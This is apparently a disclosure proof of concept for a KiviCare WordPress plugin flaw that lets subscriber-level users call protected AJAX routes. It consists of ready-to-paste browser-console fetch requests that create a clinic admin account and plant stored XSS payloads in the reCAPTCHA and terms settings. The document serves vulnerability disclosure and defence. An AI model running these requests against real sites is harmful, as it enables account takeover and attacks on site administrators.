KiviCare Management System < 3.2.1 - Subscriber+ Unauthorised AJAX Calls

Proof of Concept

Run one of the below commands in the developer console of the web browser while being on the blog as subscriber user.

To add a clinic admin:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=setup_clinic_admin&first_name=Attacker&last_name=Attacker&user_email=attacker@localhost.org&mobile_number=11&gender=other',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Then login with the username and credentials sent to the attacker@localhost.org email address

To update the Recaptcha settings (with an XSS payload)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=save_google_recaptcha_setting&status=on&site_key=<svg onload=alert(`XSS-site-key`)>&secret_key=<svg onload=alert(`XSS-secret-key`)>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered when an admin open https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_all_general_setting


To update the term and conditions message with an XSS payload:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=terms_condition_save&isVisible=1&content="><svg onload=alert(`XSS`)>"',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Then the XSS will be triggered when accessing https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=terms_condition_list (there might be other location the payload is triggered)